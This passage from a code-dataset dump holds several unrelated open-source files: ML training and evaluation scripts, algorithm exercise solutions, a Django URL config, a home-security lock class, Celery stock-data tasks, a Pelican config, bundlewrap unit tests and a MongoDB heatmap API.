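    ".csv": lambda p: pd.read_csv(p, header=None),
    ".tsv": lambda p: pd.read_csv(p, sep="\t", header=None),
}

def load_table(path):
    return READERS[path[-4:]](path)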
metadata={\n \"help\": \"Pretrained config name or path if not the same as model_name\"\n },\n )\n tokenizer_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"Pretrained tokenizer name or path if not the same as model_name\"\n },\n )\n use_fast: bool = field(\n default=False, metadata={\"help\": \"Set this flag to use fast tokenization.\"}\n )\n # If you want to tweak more attributes on your tokenizer, you should do it in a distinct script,\n # or just modify its tokenizer_config.json.\n cache_dir: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"Where do you want to store the pretrained models downloaded from s3\"\n },\n )\n\n\n@dataclass\nclass DataTrainingArguments:\n \"\"\"\n Arguments pertaining to what data we are going to input our model for training and eval.\n \"\"\"\n\n name: str = field(metadata={\"help\": \"The name of the dataset used\"})\n\n data_dir: str = field(\n metadata={\n \"help\": \"The input data dir. Should contain the .txt files for a CoNLL-2003-formatted task.\"\n }\n )\n positive_label: str = field(metadata={\"help\": \"Positive label - labelled as 1.\"})\n labels: Optional[str] = field(\n metadata={\"help\": \"Path to a training file from which to fetch the labels.\"}\n )\n file_name: str = field(metadata={\"help\": \"Filename to be used to read data in.\"})\n file_name_token: str = field(metadata={\"help\": \"filename of the token-level files\"})\n max_seq_length: int = field(\n default=128,\n metadata={\n \"help\": \"The maximum total input sequence length after tokenization. Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\"\n },\n )\n overwrite_cache: bool = field(\n default=False,\n metadata={\"help\": \"Overwrite the cached training and evaluation sets\"},\n )\n\n\ndatasets = dict(\n fce_v1=DataTrainingArguments(\n name=\"fce_v1\",\n data_dir=\"data/fce_v1_tsv\",\n labels=\"data/fce_v1_tsv/fce-public.train.original.tsv_sentencelevel\",\n file_name=\"fce-public.{mode}.original.tsv_sentencelevel\",\n file_name_token=\"fce-public.{mode}.original.tsv\",\n positive_label=\"i\",\n ),\n conll10=DataTrainingArguments(\n name=\"conll10\",\n data_dir=\"data/conll10\",\n labels=\"data/conll10/conll10_task2_rev2.cue.train.tsv_sentencelevel\",\n file_name=\"conll10_task2_rev2.cue.{mode}.tsv_sentencelevel\",\n file_name_token=\"conll10_task2_rev2.cue.{mode}.tsv\",\n positive_label=\"C\",\n ),\n sst2_pos=DataTrainingArguments(\n name=\"sst2_pos\",\n data_dir=\"data/SST_labelling\",\n labels=\"data/SST_labelling/stanford_sentiment.train.sentences.positive.tsv\",\n file_name=\"stanford_sentiment.{mode}.sentences.positive.tsv\",\n file_name_token=\"stanford_sentiment.{mode}.tokens.positive.tsv\",\n positive_label=\"P\",\n ),\n sst2_neg=DataTrainingArguments(\n name=\"sst2_neg\",\n data_dir=\"data/SST_labelling\",\n labels=\"data/SST_labelling/stanford_sentiment.train.sentences.negative.tsv\",\n file_name=\"stanford_sentiment.{mode}.sentences.negative.tsv\",\n file_name_token=\"stanford_sentiment.{mode}.tokens.negative.tsv\",\n positive_label=\"N\",\n ),\n semeval_2013_twitter_pos=DataTrainingArguments(\n name=\"semeval_2013_twitter_pos\",\n data_dir=\"data/semeval15t10/semeval_2013_twitter\",\n labels=\"data/semeval15t10/semeval_2013_twitter/semeval15t10.sentences.positive.train2013.tsv\",\n file_name=\"semeval15t10.sentences.positive.{mode}2013.tsv\",\n file_name_token=\"semeval15t10.tokens.positive.{mode}2013.tsv\",\n positive_label=\"P\",\n ),\n semeval_2013_twitter_neg=DataTrainingArguments(\n 
name=\"semeval_2013_twitter_neg\",\n data_dir=\"data/semeval15t10/semeval_2013_twitter\",\n labels=\"data/semeval15t10/semeval_2013_twitter/semeval15t10.sentences.negative.train2013.tsv\",\n file_name=\"semeval15t10.sentences.negative.{mode}2013.tsv\",\n file_name_token=\"semeval15t10.tokens.negative.{mode}2013.tsv\",\n positive_label=\"N\",\n ),\n bea19=DataTrainingArguments(\n name=\"bea19\",\n data_dir=\"data/bea19\",\n labels=\"data/bea19/train.tsv_sentencelevel\",\n file_name=\"{mode}.tsv_sentencelevel\",\n file_name_token=\"{mode}.tsv\",\n positive_label=\"i\",\n )\n # sst2_pos_neg=DataTrainingArguments(\n # name=\"sst2_pos_neg\",\n # data_dir=\"data/SST-2/\",\n # labels=\"data/SST-2/train_token.tsv_sentencelevel\",\n # file_name=\"{mode}_token.tsv_sentencelevel\",\n # ),\n)\n\n\ndef is_float(value):\n \"\"\"\n Check in value is of type float()\n \"\"\"\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef parse_config(config_path, config_section=\"config\"):\n config_parser = configparser.SafeConfigParser(allow_no_value=True)\n config_parser.read(config_path)\n config = collections.OrderedDict()\n\n for key, value in config_parser.items(config_section):\n if value is None or len(value.strip()) == 0:\n config[key] = None\n elif value.lower() in [\"true\", \"false\"]:\n config[key] = config_parser.getboolean(config_section, key)\n elif value.isdigit():\n config[key] = config_parser.getint(config_section, key)\n elif is_float(value):\n config[key] = config_parser.getfloat(config_section, key)\n else:\n config[key] = config_parser.get(config_section, key)\n return config\n","repo_name":"bujol12/bert-seq-interpretability","sub_path":"utils/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"63"} +{"seq_id":"14124398018","text":"from itertools import combinations\n#import sys\n#sys.stdin = open(\"sample/input_15686.txt\", \"r\")\n\nn, m = map(int, input().split()) #도시의 크기 n, 선택할 치킨집 개수\ncity = [list(map(int, input().split())) for _ in range(n)]\nhouse, chicken = [], [] #집과 치킨집이 위치한 곳의 r, c 인덱스를 저장할 리스트\n\nfor r in range(n):\n for c in range(n):\n if city[r][c] == 1:\n house.append((r,c)) #집 위치\n elif city[r][c] == 2:\n chicken.append((r,c)) #치킨집 위치\n\n#모든 치킨집 중에서 m개의 치킨집을 뽑는 조합을 계산\ncandidates = list(combinations(chicken, m)) #치킨집개수Cm\n\n#치킨 거리를 계산\ndef get_sum(candidates):\n result = 0\n #모든 집에 대해 계산함\n for hr, hc in house:\n #가장 가까운 집을 찾음\n temp = 100\n for cr, cc in candidates:\n temp = min(temp, abs(hr-cr)+abs(hc-cc))\n #가장 가까운 치킨집 까지의 거리를 더함\n result += temp\n\n return result\n\n#치킨거리의 최소값을 찾아서 출력하게 됨\nresult = 10000\nfor candidate in candidates:\n result = min(result, get_sum(candidate))\n\nprint(result)","repo_name":"BIINNNN/prepare_CodingTest","sub_path":"Python3/BOJ/15686.py","file_name":"15686.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22106491590","text":"import os\nimport json\nimport pytz\nimport torch\nimport datetime\nimport fasttext\n\nfrom os import path\nfrom config import Config\nfrom transformers import AutoTokenizer\n\nfrom dataset import MyDataSet\nfrom trainer import Trainer\nfrom model import Model\nfrom utils import load_model\nfrom config import get_config\n\n\ndef main(args):\n tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path)\n if args.use_fasttext:\n fasttext_model = 
fasttext.load_model(args.fasttext_path)\n else:\n fasttext_model = None\n print('--------------------- MODEL SETTING UP ---------------------')\n print(f'Loading model from checkpoint {args.load_ckpt}')\n model = Model(args)\n model.load_state_dict(torch.load(args.load_ckpt, map_location=torch.device('cpu')))\n\n\n params_num = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"#Params = \", params_num)\n\n print('--------------------- DATALOADER ---------------------')\n dev_data = MyDataSet(\n name='dev',\n path=args.dev_data,\n args=args,\n tokenizer=tokenizer,\n fasttext_model=fasttext_model)\n\n test_data = MyDataSet(\n name='test',\n path=args.test_data,\n args=args,\n tokenizer=tokenizer,\n fasttext_model=fasttext_model)\n\n human_test_data = MyDataSet(\n name='human_test',\n path=args.human_test_data,\n args=args,\n tokenizer=tokenizer,\n fasttext_model=fasttext_model)\n\n trainer = Trainer(args=args,\n model=model,\n train_data=None,\n dev_data=dev_data,\n test_data=test_data,\n human_test_data=human_test_data)\n\n dev_prec, dev_recal, dev_f1 = trainer.eval('dev')\n test_prec, test_recall, test_f1 = trainer.eval('test')\n htest_prec, htest_recall, htest_f1 = trainer.eval('human_test')\n\n\nif __name__ == \"__main__\":\n args = get_config()\n args.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(f'Using Device : {args.device}')\n\n if torch.cuda.is_available():\n print(f\"GPU device : {torch.cuda.get_device_name(0)}\")\n\n if not os.path.exists(args.ckpt_dir):\n os.makedirs(args.ckpt_dir)\n\n print('--------------------- EVALUATING ---------------------')\n main(args)\n","repo_name":"demdecuong/NER-biaffine","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19656945850","text":"from typing import *\n \n \ndef getDelta(f, n) -> (Dict[str, Set[str]], Dict[str, Set[str]], Set[str]):\n delta: Dict[str, Set[str]] = dict()\n generative: Dict[str, Set[str]] = dict()\n eps: Set[str] = set()\n for state in range(n):\n req: List[str] = f.readline().strip().split()\n if req[0] not in delta.keys():\n delta[req[0]] = set()\n if len(req) == 2:\n delta[req[0]].add('')\n else:\n delta[req[0]].add(req[2])\n \n for state in delta:\n if '' in delta[state]:\n eps.add(state)\n else:\n for way in delta[state]:\n if all([i.isupper() for i in way]):\n if state not in generative:\n generative[state] = set()\n generative[state].add(way)\n \n return delta, generative, eps\n \n \nf = open(\"epsilon.in\", \"r\")\nn, s = f.readline().split()\nn = int(n)\ndelta, generative, eps = getDelta(f, n)\nsize: int = len(eps)\n \nwhile True:\n for state in generative.copy():\n for way in generative[state]:\n if all([i in eps for i in way]):\n generative.pop(state, None)\n eps.add(state)\n break\n \n if len(eps) == size:\n break\n size = len(eps)\n \nwith open(\"epsilon.out\", \"w\") as f:\n epsStates: List[str] = sorted(list(eps))\n f.write(\" \".join(epsStates))","repo_name":"SotnikovMaksim/ITMO-Labs","sub_path":"DiscreteMathCourse/S2L2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"42337651173","text":"from django.urls import include, path\nfrom rest_framework import routers\n\nfrom api.views import TagViewSet, IngredientViewSet, RecipeViewSet\nfrom users.views import 
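# Aside on the nullable-nonterminal fixpoint in the epsilon record above: a tiny
# self-contained check of the same iteration on a three-rule grammar.
delta = {"S": {"AB"}, "A": {"", "a"}, "B": {"A"}}
eps = {s for s, ways in delta.items() if "" in ways}
changed = True
while changed:
    changed = False
    for state, ways in delta.items():
        if state not in eps and any(all(c in eps for c in way) for way in ways):
            eps.add(state)
            changed = True
print(sorted(eps))  # ['A', 'B', 'S']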
CustomUserViewSet\n\napp_name = \"api\"\n\n\nrouter = routers.DefaultRouter()\n\nrouter.register(\"users\", CustomUserViewSet, \"users\")\nrouter.register(\"tags\", TagViewSet, \"tags\")\nrouter.register(\"ingredients\", IngredientViewSet, \"ingredients\")\nrouter.register(\"recipes\", RecipeViewSet, \"recipes\")\n\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(\"\", include(\"djoser.urls\")),\n path(\"auth/\", include(\"djoser.urls.authtoken\")),\n]\n","repo_name":"DPavlen/foodgram-project-react","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40689014906","text":"\"\"\"Alarm.com lock.\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\n\nfrom . import BaseDevice, DeviceType\n\nlog = logging.getLogger(__name__)\n\n\nclass Lock(BaseDevice):\n \"\"\"Represent Alarm.com sensor element.\"\"\"\n\n class DeviceState(BaseDevice.DeviceState):\n \"\"\"Enum of lock states.\"\"\"\n\n # https://www.alarm.com/web/system/assets/customer-ember/enums/LockStatus.js\n\n UNKNOWN = 0\n LOCKED = 1\n UNLOCKED = 2\n\n class Command(BaseDevice.Command):\n \"\"\"Commands for ADC locks.\"\"\"\n\n LOCK = \"lock\"\n UNLOCK = \"unlock\"\n\n async def async_lock(self) -> None:\n \"\"\"Send lock command.\"\"\"\n\n await self.async_handle_external_desired_state_change(self.DeviceState.LOCKED)\n\n await self._send_action(\n device_type=DeviceType.LOCK,\n event=self.Command.LOCK,\n device_id=self.id_,\n )\n\n async def async_unlock(self) -> None:\n \"\"\"Send unlock command.\"\"\"\n\n await self.async_handle_external_desired_state_change(self.DeviceState.UNLOCKED)\n\n await self._send_action(\n device_type=DeviceType.LOCK,\n event=self.Command.UNLOCK,\n device_id=self.id_,\n )\n","repo_name":"pyalarmdotcom/pyalarmdotcomajax","sub_path":"pyalarmdotcomajax/devices/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"82"} +{"seq_id":"28286648767","text":"import logging\nfrom celery.schedules import crontab\nimport datetime as dt\n\nimport time\nfrom celery import Celery\nfrom ftplib import FTP\ncelery = Celery('tasks')\n\nfrom app.models import Stock\nimport os, sys\n\ncelery.conf.CELERY_BROKER = 'amqp://'\ncelery.conf.CELERY_BACKEND = 'amqp'\ncelery.conf.CELERY_TIMEZONE = 'UTC'\n\n# THIS IS UTC TIME, which is +4 hours of EST\nHOUR = 16 \nMINUTE = 10\n\n# READ THIS...\n#\n# Start the broker.\n# rabbitmq-server is located in /usr/local/sbin\n# /usr/local/sbin/rabbitmq-server -detached\n#\n# Start Celery from the ~/Code/python/cf2 directory\n# celery -app=tasks worker --loglevel=info -B\n\ncelery.conf.CELERYBEAT_SCHEDULE = {\n 'download_stock_files': {\n 'task': 'tasks.download_stock_files',\n 'schedule': crontab(hour=HOUR,minute=MINUTE)\n },\n 'parse_stock_files': {\n 'task': 'tasks.parse_stock_files',\n 'schedule': crontab(hour=HOUR,minute=MINUTE+1)\n }\n #'calculate_indicators': {\n # 'task': 'tasks.calculate_indicators',\n # 'schedule': crontab(hour=HOUR,minute=MINUTE)\n #}\n}\n\n@celery.task\ndef download_stock_files_task(): \n download_stock_files()\n\ndef download_stock_files(): \n logging.info('Begin downloading stock files...')\n try:\n ftp = FTP('ftp.nasdaqtrader.com') \n ftp.login()\n ftp.cwd('symboldirectory')\n ftp.retrbinary('RETR nasdaqlisted.txt', open('app/static/symbols/nasdaqlisted.txt', 'wb').write) \n 
ftp.retrbinary('RETR otherlisted.txt', open('app/static/symbols/otherlisted.txt', 'wb').write) \n logging.info('Finished downloading stock files.')\n except Exception as e:\n logging.warning(\"Couldn't download the nightly NASDAQ/NYSE files. Error message: %s\", e)\n\n@celery.task\ndef parse_stock_files_task():\n parse_stock_files()\n\ndef parse_stock_files():\n '''File information here: http://www.nasdaqtrader.com/trader.aspx?id=symboldirdefs'''\n logging.info('Begin parsing the files and refreshing stock data.')\n parse_nasdaq('NASDAQ')\n parse_other('NYSE')\n logging.info('Finished parsing the files and refreshing stock data.')\n\ndef parse_nasdaq(market):\n logging.info('Begin parsing %s file.', market)\n path = os.path.join(os.path.dirname(__file__),'app/static/symbols/nasdaqlisted.txt')\n with open(path, 'r') as inFile: \n next(inFile) # ignore header\n for line in inFile:\n #time.sleep(1)\n split= line.strip('\\r\\n').split('|')\n # if it's not a test stock and not the last line\n if split[3] != \"Y\" and \"File Creation Time\" not in split[0]:\n symbol = split[0]\n name = split[1]\n logging.info('Fetching data. Market: %s, Symbol: %s, Company Name: %s', market, symbol, name)\n create_or_update_stock(symbol, name, market)\n logging.info('Finished parsing %s file.', market)\n\ndef create_or_update_stock(symbol, name, market):\n stock = Stock.query.filter(Stock.symbol == symbol,\n Stock.market==market).first()\n if stock is None:\n logging.info('New stock (not currently in our database): Market: %s, Symbol: %s, Company Name: %s', market, symbol, name)\n stock = Stock(symbol=symbol,name=name,market=market)\n df = stock.get_dataframe()\n if df is None or len(df) == 0:\n logging.warning('Error retrieving Stock from the database (DataFrame is empty...): Stock.id: %s, Market: %s, Symbol: %s, Company Name: %s', stock.id, market, symbol, name)\n else:\n stock.calculate_indicators()\n\n\n@celery.task\ndef calculate_indicators_task():\n calculate_indicators()\n\ndef calculate_indicators():\n logging.info('Begin Calculating indicators for all stocks.')\n for stock in Stock.query.all():\n logging.info('Updating indicators for %s [%s]', stock.symbol, stock.name)\n stock.calculate_indicators()\n\ndef parse_other(market):\n logging.info('Begin parsing %s file.', market)\n path = os.path.join(os.path.dirname(__file__),'app/static/symbols/otherlisted.txt')\n with open(path, 'r') as inFile: \n next(inFile) # ignore header\n for line in inFile:\n #time.sleep(1)\n split = line.strip('\\r\\n').split('|')\n # if it's not a test stock and not the last line\n if 'File Creation Time' not in split[0] and split[2] == 'N' and split[6] != 'Y':\n symbol = split[7]\n name = split[1]\n logging.info('Fetching data. 
Market: %s, Symbol: %s, Company Name: %s', market, symbol, name)\n create_or_update_stock(symbol, name, market)\n logging.info('Finished parsing %s file.', market)\n\n\n","repo_name":"grantbachman/chartflux2","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33067211861","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'Sarah Bird'\nSITENAME = u'Bokeh Cookbook'\nSITEURL = 'http://bokeh-cookbook.github.io'\nTITLE = 'Bokeh Cookbook'\nSUBTITLE = 'Recipes, tips & tricks for using & developing bokeh'\n\nPATH = 'content'\n\nTHEME = 'theme/'\nTIMEZONE = 'UTC'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\nFEED_RSS = 'feeds/all.rss.xml'\n\nDEFAULT_PAGINATION = 10\n\nPLUGIN_PATHS = [\"plugins\"]\nPLUGINS = [\"page_hierarchy\", \"ipynb.markup\"]\nIGNORE_FILES = ['.ipynb_checkpoints']\n\nPAGE_URL = '{slug}/'\nPAGE_SAVE_AS = '{slug}/{slug}.html'\nSLUGIFY_SOURCE = 'basename'\n\nSTATIC_PATHS = ['assets']\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\n# ipynb plugin\nMARKUP = ('md', 'ipynb')\n\nARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'\nARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'\n\nSUMMARY_MAX_LENGTH = 10\n","repo_name":"bokeh-cookbook/bokeh-cookbook","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"13177015604","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom unittest import TestCase\n\ntry:\n from unittest.mock import MagicMock, patch\nexcept ImportError:\n from mock import MagicMock, patch\n\nfrom bundlewrap.items import Item\nfrom bundlewrap.exceptions import BundleError\n\n\nclass MockItem(Item):\n BUNDLE_ATTRIBUTE_NAME = \"mock\"\n ITEM_TYPE_NAME = \"type1\"\n NEEDS_STATIC = []\n\n\nclass ApplyTest(TestCase):\n \"\"\"\n Tests bundlewrap.items.Item.apply.\n \"\"\"\n def test_noninteractive(self):\n status_before = MagicMock()\n status_before.correct = False\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n item.apply(interactive=False)\n self.assertEqual(item.fix.call_count, 1)\n self.assertEqual(item.get_status.call_count, 2)\n\n @patch('bundlewrap.items.ask_interactively', return_value=True)\n def test_interactive(self, ask_interactively):\n status_before = MagicMock()\n status_before.correct = False\n status_before.fixable = True\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.ask = MagicMock(return_value=\"?\")\n item.fix = MagicMock()\n item.apply(interactive=True)\n self.assertEqual(item.fix.call_count, 1)\n assert ask_interactively.call_count == 1\n\n @patch('bundlewrap.items.ask_interactively', return_value=False)\n def test_interactive_abort(self, ask_interactively):\n status_before = MagicMock()\n status_before.correct = False\n status_before.fixable = True\n status_before.skipped = 
False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.ask = MagicMock(return_value=\"?\")\n item.fix = MagicMock()\n result = item.apply(interactive=True)\n self.assertFalse(item.fix.called)\n assert ask_interactively.call_count == 1\n self.assertEqual(result, Item.STATUS_SKIPPED)\n\n def test_correct(self):\n status_before = MagicMock()\n status_before.correct = True\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n result = item.apply()\n self.assertFalse(item.fix.called)\n self.assertEqual(result, Item.STATUS_OK)\n\n def test_unless(self):\n status_before = MagicMock()\n status_before.correct = False\n status_before.skipped = False\n item = MockItem(\n MagicMock(),\n \"item1\",\n {'unless': \"true\"},\n skip_validation=True,\n )\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n\n run_result = MagicMock()\n run_result.return_code = 0\n item.node.run.return_value = run_result\n\n result = item.apply()\n self.assertFalse(item.fix.called)\n self.assertEqual(result, Item.STATUS_SKIPPED)\n\n def test_unless_fails(self):\n status_before = MagicMock()\n status_before.correct = False\n status_before.skipped = False\n item = MockItem(\n MagicMock(),\n \"item1\",\n {'unless': \"false\"},\n skip_validation=True,\n )\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n\n run_result = MagicMock()\n run_result.return_code = 1\n item.node.run.return_value = run_result\n\n item.apply()\n self.assertTrue(item.fix.called)\n\nclass InitTest(TestCase):\n \"\"\"\n Tests initialization of bundlewrap.items.Item.\n \"\"\"\n @patch('bundlewrap.items.Item._validate_attribute_names')\n @patch('bundlewrap.items.Item._validate_required_attributes')\n @patch('bundlewrap.items.Item.validate_attributes')\n def test_init_no_validation(self, validate_names, validate_required,\n validate_values):\n bundle = MagicMock()\n i = MockItem(bundle, \"item1\", {}, skip_validation=True)\n self.assertEqual(i.bundle, bundle)\n self.assertEqual(i.name, \"item1\")\n self.assertFalse(validate_names.called)\n self.assertFalse(validate_required.called)\n self.assertFalse(validate_values.called)\n\n @patch('bundlewrap.items.Item._validate_attribute_names')\n @patch('bundlewrap.items.Item._validate_required_attributes')\n @patch('bundlewrap.items.Item.validate_attributes')\n def test_init_with_validation(self, validate_names, validate_required,\n validate_values):\n MockItem(MagicMock(), MagicMock(), {}, skip_validation=False)\n self.assertTrue(validate_names.called)\n self.assertTrue(validate_required.called)\n self.assertTrue(validate_values.called)\n\n def test_attribute_name_validation_ok(self):\n MockItem.ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n MockItem._validate_attribute_names(MagicMock(), \"item:id\", {'foo': 49, 'needs': []})\n\n def test_attribute_name_validation_fail(self):\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n with self.assertRaises(BundleError):\n item._validate_attribute_names(\n MagicMock(),\n \"item:id\",\n {\n 'foobar': 49,\n 'bar': 50,\n 'needs': [],\n },\n )\n\n def test_name_validation_fail(self):\n with self.assertRaises(BundleError):\n MockItem._validate_name(\n MagicMock(),\n \"my:bad_name\",\n )\n\n def test_required_attributes(self):\n class 
ReqMockItem(MockItem):\n REQUIRED_ATTRIBUTES = ['foo', 'bar', 'baz']\n\n item = ReqMockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n with self.assertRaises(BundleError):\n item._validate_required_attributes(\n MagicMock(),\n \"item:id\",\n {\n 'foobar': 49,\n 'bar': 50,\n 'needs': [],\n },\n )\n\n def test_subclass_attributes(self):\n class MyItem(MockItem):\n ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n\n i = MyItem(MagicMock(), MagicMock(), {'foo': 49})\n self.assertEqual(i.attributes, {'foo': 49, 'bar': 48})\n\n\nclass BundleCollisionTest(TestCase):\n \"\"\"\n Tests bundlewrap.items.__init__.Item._check_bundle_collisions.\n \"\"\"\n def test_collision(self):\n item1 = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item2 = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n with self.assertRaises(BundleError):\n item1._check_bundle_collisions([item1, item2])\n\n def test_no_collision(self):\n item1 = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item2 = MockItem(MagicMock(), \"item2\", {}, skip_validation=True)\n item1._check_bundle_collisions([item1, item2])\n","repo_name":"sq3/bundlewrap","sub_path":"tests_legacy/unit/items/item_tests.py","file_name":"item_tests.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"40582627925","text":"# -*- coding: utf-8 -*-\r\n# __author__ = 'zzg'\r\n\r\nfrom bson.objectid import ObjectId\r\nimport datetime\r\nimport json\r\nimport os\r\nimport re\r\nimport pickle\r\nimport unittest\r\nimport pandas as pd\r\nfrom mbio.api.database.whole_transcriptome.api_base import ApiBase\r\n\r\n\r\nclass CorHeatmap(ApiBase):\r\n def __init__(self, bind_object):\r\n super(CorHeatmap, self).__init__(bind_object)\r\n self._project_type = 'tool_lab'\r\n\r\n def add_corheatmap(self, CorHeatmap_path, project_sn='tool_lab', main_id=None, task_id='tool_lab', params=None):\r\n if main_id is None:\r\n name = \"corheatmap\"+'_'\r\n time_now = datetime.datetime.now()\r\n name += time_now.strftime(\"%Y%m%d_%H%M%S\")\r\n main_info = dict(\r\n project_sn=project_sn,\r\n task_id=task_id,\r\n version=\"v2\",\r\n name=name,\r\n created_ts=time_now.strftime('%Y-%m-%d %H:%M:%S'),\r\n desc='corheatmap',\r\n params= params if params else \"null\",\r\n status=\"start\",\r\n )\r\n main_id = self.create_db_table('sg_cor_heatmap', [main_info])\r\n else:\r\n main_id = ObjectId(main_id)\r\n\r\n if type(main_id) == str or type(main_id) == bytes or type(main_id) == unicode:\r\n main_id = ObjectId(main_id)\r\n\r\n if os.path.exists(CorHeatmap_path + \"/correlation_spearmanr.xls\"):\r\n correction_file = CorHeatmap_path + \"/correlation_spearmanr.xls\"\r\n pvalue_file = CorHeatmap_path + \"/pvalue_spearmanr.xls\"\r\n else:\r\n correction_file = CorHeatmap_path + \"/correlation_pearsonr.xls\"\r\n pvalue_file = CorHeatmap_path + \"/pvalue_pearsonr.xls\"\r\n\r\n if os.path.exists(CorHeatmap_path + \"/row_tree.tre\"):\r\n with open(CorHeatmap_path + \"/row_tree.tre\") as f:\r\n row_tree = f.readline().strip()\r\n row_tree_list = re.findall('[(,]([^(]*?):', row_tree)\r\n tree_info_row = dict(\r\n name=\"row_tree\",\r\n direction=\"h\",\r\n data=row_tree,\r\n type=\"tree\",\r\n cor_id=main_id,\r\n )\r\n self.create_db_table('sg_cor_heatmap_detail', [tree_info_row])\r\n if os.path.exists(CorHeatmap_path + \"/column_tree.tre\"):\r\n with open(CorHeatmap_path + \"/column_tree.tre\") as f:\r\n column_tree = 
f.readline().strip()\r\n column_tree_list = re.findall('[(,]([^(]*?):', column_tree)\r\n tree_info_column = dict(\r\n name=\"column_tree\",\r\n direction=\"v\",\r\n data=column_tree,\r\n type=\"tree\",\r\n cor_id=main_id,\r\n )\r\n self.create_db_table('sg_cor_heatmap_detail', [tree_info_column])\r\n \"\"\"\r\n column_tree_new_name = []\r\n column_tree_name_dict = {}\r\n for i in range(len(column_tree_list)):\r\n column_tree_new_name.append(\"name\" + str(i + 1))\r\n column_tree_name_dict[\"name\" + str(i + 1)] = column_tree_list[i]\r\n column_name = json.dumps(column_tree_name_dict)\r\n \"\"\"\r\n column_name = []\r\n with open(correction_file,\"r\") as h:\r\n a = h.readlines()\r\n for i in range(len(a[1:])):\r\n column_name.append(a[i+1].strip(\"\\n\").split(\"\\t\")[0])\r\n df1 = pd.read_table(correction_file, index_col=0, sep='\\t')\r\n df_cor1 = df1.reindex(column_name)\r\n #df_cor.index = column_name\r\n df_cor = df_cor1.reset_index()\r\n df_cor['cor_id'] = main_id\r\n df_cor['type'] = 'heatmap'\r\n #df_cor['name'] = column_tree_new_name\r\n self.create_db_table('sg_cor_heatmap_detail', df_cor.to_dict('r'))\r\n df2 = pd.read_table(pvalue_file, index_col=0, sep='\\t')\r\n df_pva1 = df2.reindex(column_name)\r\n #df_pva.index = column_tree_new_name\r\n df_pva = df_pva1.reset_index()\r\n df_pva['cor_id'] = main_id\r\n df_pva['type'] = 'heatmap_asterisk'\r\n #df_pva['name'] = column_tree_new_name\r\n self.create_db_table('sg_cor_heatmap_detail', df_pva.to_dict('r'))\r\n '''\r\n heatmap_data = {\"heatmap_data\": [{\"name\": \"name\", \"data\": row_name}],\r\n \"condition\": {\"type\": \"heatmap\"}}\r\n heatmap_asterisk_data = {\"heatmap_asterisk_data\": [{\"name\": \"sample_name\", \"data\": row_name}],\r\n \"condition\": {\"type\": \"heatmap_asterisk\"}}\r\n tree_data = {\"tree_data\": [{\"name\": \"tree_name\"}],\r\n \"condition\": {\"type\": \"tree \"}}\r\n heatmap_data_info = json.dumps(heatmap_data, sort_keys=False, separators=(',', ':'))\r\n heatmap_asterisk_data_info = 